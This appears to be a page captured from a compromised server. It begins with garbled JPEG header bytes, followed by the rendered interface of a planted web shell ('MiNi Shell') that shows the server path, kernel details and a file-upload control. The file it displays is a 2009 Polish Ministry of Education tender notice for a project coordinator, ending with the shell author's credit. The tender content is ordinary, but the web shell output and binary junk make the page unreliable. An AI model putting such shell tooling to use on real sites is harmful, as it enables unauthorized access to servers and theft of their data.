JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090211/25358-N-2009.html

<p class="kh_header"><b>Warszawa: Usługa /Pełnienia funkcji koordynatora merytorycznego 
i asystenta koordynatora merytorycznego projektu systemowego MEN - realizowanego w ramach PO KL Poddziałanie 3.3.3 pt. /Wdrożenie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół/</b><br>
<b>Numer ogłoszenia: 25358 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Edukacji Narodowej , al. Jana Chrystiana Szucha 25, 00-918 Warszawa, woj. mazowieckie, tel. 022 3474100; 022 3474157, faks 022 6223704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.men.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa /Pełnienia funkcji koordynatora merytorycznego 
i asystenta koordynatora merytorycznego projektu systemowego MEN - realizowanego w ramach PO KL Poddziałanie 3.3.3 pt. /Wdrożenie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia

I. Opis zadań stanowiących przedmiot zamówienia.
Koordynacja projektu systemowego MEN - realizowanego w ramach PO KL Poddziałanie 3.3.3 pt. /Wdrożenie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół/. Do zadań Wykonawcy będącego dwuosobowym zespołem składającym się z koordynatora merytorycznego projektu i asystenta koordynatora merytorycznego będą należeć w szczególności następujące zadania. 
Dla koordynatora merytorycznego projektu:
-prowadzenie działań w celu sprawnej realizacji założeń projektu o których mowa w opisie projektu
-koordynowanie projektu zgodnie z przyjętym przez Departament Funduszy Strukturalnych MEN harmonogramem działań, harmonogramem budżetu;
-koordynowanie i zarządzanie jakością projektu i terminowością realizacji projektu;
-utrzymywanie kontaktów i kontrola pracy wykonawców projektu: ekspertów, recenzentów, moderatora, grafika wykonujących działania projektowe oraz zapewnienie sprawnego przepływu informacji pomiędzy osobami zaangażowanymi w realizację projektu 
-prowadzenie dokumentacji merytorycznej i finansowej projektu (gromadzenie i porządkowanie dokumentów i przedkładanie je opiekunowi projektu) oraz nadzorowanie korespondencji dotyczącej projektu;
-utrzymywanie kontaktów z opiekunem projektu w DFS MEN, w szczególności przekazywanie comiesięcznej informacji do opiekuna o przebiegu realizacji projektu, planowanych w nim zmianach, weryfikacjach oraz współpraca przy przygotowywaniu sprawozdań z realizacji projektu;
-przygotowywanie dokumentów związanych z realizacją projektu (harmonogram działań, harmonogram spotkań wykonawców, harmonogram wydatków w ramach budżetu projektu), a następnie przedkładanie je opiekunowi projektu;
-współorganizowanie z zespołem ekspertów i asystentem spotkań i warsztatów oraz konferencji upowszechniających efekty projektu;
-upowszechnianie materiałów promocyjnych dotyczących projektu;
-zapewnianie sprawnego przepływu informacji pomiędzy wszystkimi uczestnikami projektu;
-udostępnianie dokumentacji projektu instytucjom uprawnionym do przeprowadzania kontroli i audytu;
-udział w działaniach związanych z zamykaniem projektu po upływie okresu jego realizacji.
Dla asystenta koordynatora merytorycznego projektu: 
- prace wskazane przez koordynatora merytorycznego projektu w zakresie realizacji zadań o których mowa w opisie projektu. 

II. Informacje dodatkowe o przedmiocie zamówienia - opis projektu  
Działanie 3.3 Poprawa jakości kształcenia
Poddziałanie 3.3.3 Modernizacja treści i metod kształcenia
Tytuł projektu: Wdrożenie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół
Beneficjent/ Projektodawca
Ministerstwo Edukacji Narodowej
Krótki opis działań planowanych w ramach projektu,
Projekt zakłada Wdrożenie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół. Okres realizacji projektu luty 2009 - styczeń 2010
W ramach projektu zakłada się:
a)konferencję dla ok. 1000 dyrektorów szkół podstawowych i gimnazjów podsumowująca proces konsultacji projektowanych rozwiązań organizacyjnych dotyczących wdrażania podstawy programowej - prezentacja przyjętych rozwiązań; 
b)przeszkolenie ok. 400 rzeczoznawców podręczników szkolnych w celu przygotowania ich do oceny zgodności treści zawartych w podręcznikach z treściami zawartymi we wdrażanej podstawie programowej wychowania przedszkolnego i kształcenia ogólnego;
c)przeszkolenie ok. 150 pracowników systemu egzaminacyjnego w celu przygotowania ich do opracowywania arkuszy egzaminacyjnych zgodnych z wdrażaną podstawą programową kształcenia ogólnego;
d)przeszkolenie ok. 250 pracowników nadzoru pedagogicznego w celu przygotowania ich do nadzorowania realizacji w szkołach podstawy programowej kształcenia ogólnego;
e)przeszkolenie 2500 doradców metodycznych i nauczycieli konsultantów w celu prowadzenia szkoleń dla nauczycieli w zakresie realizacji podstawy programowej; 
f)publikację materiałów szkoleniowych oraz promocyjnych, w tym ok. 170 tys. egzemplarzy części podstawy  programowej wraz z komentarzem,
g)upowszechnianie wśród dyrektorów szkół podstawowych i gimnazjów nowych rozwiązań  organizacyjnych związanych z  podstawą programową; 
h)zdobycie przez rzeczoznawców umiejętności właściwej oceny zgodności podręczników  z założeniami zawartymi w podstawie programowej;
i)lepsze przygotowanie kadry sprawującej nadzór pedagogiczny do spełniania swoich zadań pod kątem zgodności z założeniami podstawy programowej;
j)przygotowanie pracowników systemu egzaminacyjnego do konstruowania arkuszy egzaminacyjnych zgodnych z nowa podstawą programową,
k)przygotowanie doradców metodycznych do prowadzenia szkoleń nauczycieli w zakresie realizacji podstawy programowej,
l)upowszechnienie podstawy programowej.
Szacowany budżet projektu: 9 000 000.00 zł.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu 
z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy. 
2.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1 do 3 ustawy, w szczególności  dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Przez osoby zdolne do wykonania zamówienia rozumie się zespół dwóch osób posiadających następujące kwalifikacje:

A.   koordynator merytoryczny - jedna osoba: 
1)Wykształcenie wyższe.
2)Gruntowna znajomość problematyki podstawy programowej wychowania przedszkolnego i kształcenia ogólnego w poszczególnych typach szkół, w szczególności znajomość koncepcji nowej podstawy programowej kształcenia ogólnego.  Zamawiający rozumie przez to znajomość, co najmniej następujących dokumentów:                     
-Rozporządzenie Ministra Edukacji Narodowej z dnia 23 grudnia 2008 r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół. (Dz. U. z 2009 r. nr  4, poz. 17). 
-Jak organizować edukację w szkole podstawowej? Poradnik dyrektora szkoły. Dokument dostępny jest na stronie http://www.reformaprogramowa.men.gov.pl/poradnik_podstawowki/.  
-Jak organizować edukację w gimnazjum i liceum? Poradnik dyrektora szkoły. Dokument dostępny jest na stronie: http://www.reformaprogramowa.men.gov.pl/poradnik_gimnazja_i_licea/.                                 
3)Dobra znajomość problematyki edukacyjnej, ze szczególnym uwzględnieniem systemu egzaminacyjnego oraz międzynarodowych badań edukacyjnych. Zamawiający rozumie przez to znajomość, co najmniej następujących dokumentów:
-Ustawa z dnia 7 września 1991 r. o systemie oświaty (z późn. zm.).
-Rozporządzenie Ministra Edukacji Narodowej i Sportu z dnia 7 września 2004 r. w sprawie warunków i sposobu oceniania, klasyfikowania i promowania uczniów i słuchaczy oraz przeprowadzania sprawdzianów i egzaminów w szkołach publicznych (Dz. U. Nr 199, poz. 2046, z późn. zm.).
-Program Międzynarodowej Oceny Umiejętności Uczniów OECD PISA. Wyniki badania 2006 w Polsce.     
4)Doświadczenie w kierowaniu min. 1 projektem w zakresie edukacji, polegające w szczególności na koordynacji prac zespołu liczącego, co najmniej 50 osób. 
5)Co najmniej roczne doświadczenie w kierowaniu projektami finansowanymi z udziałem środków Europejskiego Funduszu Społecznego o całkowitej wartości, co najmniej trzech milionów złotych. 
6)Doświadczenie w opracowaniu min. 1 wydawnictwa o charakterze edukacyjnym, tzn. autorstwo, współautorstwo albo redakcja podręczników, poradników itp. z zakresu edukacji.  
7)Doświadczenie w zakresie upowszechniania wiedzy w środowisku edukacyjnym tzn. prowadzenie wykładów, szkoleń, warsztatów, seminariów itp. z zakresu  edukacji dla kadr oświatowych.    
     oraz 

 B.  asystent koordynatora merytorycznego - jedna osoba:
1)Wykształcenie wyższe.
2)Doświadczenie w pracy w projektach edukacyjnych. 
3)Doświadczenie w prowadzeniu prac analitycznych lub badawczych w dziedzinie edukacji. 
4)Doświadczenie w pracy w projektach finansowanych z udziałem środków  Europejskiego Funduszu Społecznego. 

Wykonawca może wskazać tylko jedną osobę, która będzie wykonywać pracę koordynatora merytorycznego i jedną osobę, która będzie wykonywać pracę asystenta koordynatora merytorycznego. Jednocześnie, nie można wskazać tej samej osoby do pracy na obu wymienionych stanowiskach.  

3 .W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
a) żaden z Wykonawców nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy, 
b) warunki określone w art. 22 ust. 1 pkt 1-3 ustawy musi spełniać przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy łącznie.

4. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach wyszczególnionych poniżej. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie, że Wykonawca nie podlega wykluczeniu, na podstawie art. 24 ustawy. 
2.Oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy. 
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa odpowiednio dokument/y na potwierdzenie spełnienia warunków udziału w postępowaniu zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. Nr 87, poz. 605 z późn. zm.).
5.Na potwierdzenie warunku opisanego w Rozdziale 7 ust. 2 Wykonawca dołączy do oferty:
5.1. oświadczenie o dysponowaniu osobami zdolnymi do wykonania zamówienia lub 
pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia tj. oświadczenie o dysponowaniu zespołem osób posiadających następujące kwalifikacje dwiema osobami posiadającymi następujące kwalifikacje:

A.   koordynator merytoryczny - jedna osoba 
1)Wykształcenie wyższe,
2)Gruntowna znajomość problematyki podstawy programowej wychowania przedszkolnego i kształcenia ogólnego w poszczególnych typach szkół, w szczególności znajomość koncepcji nowej podstawy programowej kształcenia ogólnego.  Zamawiający rozumie przez to znajomość, co najmniej następujących dokumentów:                     
-Rozporządzenie Ministra Edukacji Narodowej z dnia 23 grudnia 2008 r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół. (Dz. U. z 2009 r. nr  4, poz. 17). 
-Jak organizować edukację w szkole podstawowej? Poradnik dyrektora szkoły. Dokument dostępny jest na stronie http://www.reformaprogramowa.men.gov.pl/poradnik_podstawowki/.  
-Jak organizować edukację w gimnazjum i liceum? Poradnik dyrektora szkoły. Dokument dostępny jest na stronie: http://www.reformaprogramowa.men.gov.pl/poradnik_gimnazja_i_licea/.                                 
3)Dobra znajomość problematyki edukacyjnej, ze szczególnym uwzględnieniem systemu egzaminacyjnego oraz międzynarodowych badań edukacyjnych. Zamawiający rozumie przez to znajomość, co najmniej następujących dokumentów:
-Ustawa z dnia 7 września 1991 r. o systemie oświaty (z późn. zm.).
-Rozporządzenie Ministra Edukacji Narodowej i Sportu z dnia 7 września 2004 r. w sprawie warunków i sposobu oceniania, klasyfikowania i promowania uczniów i słuchaczy oraz przeprowadzania sprawdzianów i egzaminów w szkołach publicznych (Dz. U. Nr 199, poz. 2046, z późn. zm.).
-Program Międzynarodowej Oceny Umiejętności Uczniów OECD PISA. Wyniki badania 2006 w Polsce.     
4)Doświadczenie w kierowaniu min. 1 projektem w zakresie edukacji, polegające w szczególności na koordynacji prac zespołu liczącego, co najmniej 50 osób, 
5)Co najmniej roczne doświadczenie w kierowaniu projektami finansowanymi z udziałem środków Europejskiego Funduszu Społecznego o całkowitej wartości, co najmniej trzech milionów złotych,
6)Doświadczenie w opracowaniu min. 1 wydawnictwa o charakterze edukacyjnym, tzn. autorstwo, współautorstwo albo redakcja podręczników, poradników itp. z zakresu edukacji,
7)Doświadczenie w zakresie upowszechniania wiedzy w środowisku edukacyjnym tzn. prowadzenie wykładów, szkoleń, warsztatów, seminariów itp. z zakresu  edukacji dla kadr oświatowych,   
oraz 

B. asystent koordynatora merytorycznego - jedna osoba 
1)Wykształcenie wyższe, 
2)Doświadczenie w pracy w projektach edukacyjnych, 
3)Doświadczenie w prowadzeniu prac analitycznych lub badawczych w dziedzinie edukacji, 
4)Doświadczenie w pracy w projektach finansowanych z udziałem środków  Europejskiego Funduszu Społecznego. 

5.2. życiorysy osób, które będą wykonywały zamówienie, zawierające co najmniej poniższe informacje : 
A.w przypadku koordynatora merytorycznego:
1. informacje o projektach którymi kierował obejmującą: 
-nazwę projektu, wartość całkowitą projektu w złotych, nazwę beneficjenta projektu (podmiot realizujący);
-nazwę programu operacyjnego lub inicjatywy wspólnotowej, w ramach której realizowany był projekt,
-nazwę funkcji, jakie osoba pełniła w projekcie z podaniem okresu ich pełnienia. 
-ilość osób wchodzących w skład kierowanego zespołu 
2. informację o publikacjach, co najmniej tytuł, autora (autorów), rok wydania.

B. w przypadku asystenta koordynatora merytorycznego:
1. informacje o projektach w pracach których uczestniczył obejmującą:
-nazwę projektu, nazwę beneficjenta projektu (podmiot realizujący);
-nazwę programu operacyjnego lub inicjatywy wspólnotowej, w ramach której realizowany był projekt,
-nazwę funkcji, jakie osoba pełniła w projekcie z podaniem okresu ich pełnienia. 
5.3. dyplomy ukończenia studiów wyższych w przypadku koordynatora merytorycznego i asystenta koordynatora merytorycznego.

Uwaga: Oświadczenie o spełnianiu warunków udziału w postępowaniu wymienione w ust. 1 i 2 należy złożyć w formie oryginału, natomiast dokumenty wymienione w ust. 3 - 5 w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Jakość - Koncepcja realizacji projektu - 50</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.men.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Edukacji Narodowej 
Biuro Administracyjne, pok. nr 29
00-918 Warszawa, Al. Szucha 25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2009 godzina 10:00, miejsce: Ministerstwo Edukacji Narodowej 
Biuro Administracyjne, pok. nr 29
00-918 Warszawa, Al. Szucha 25.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com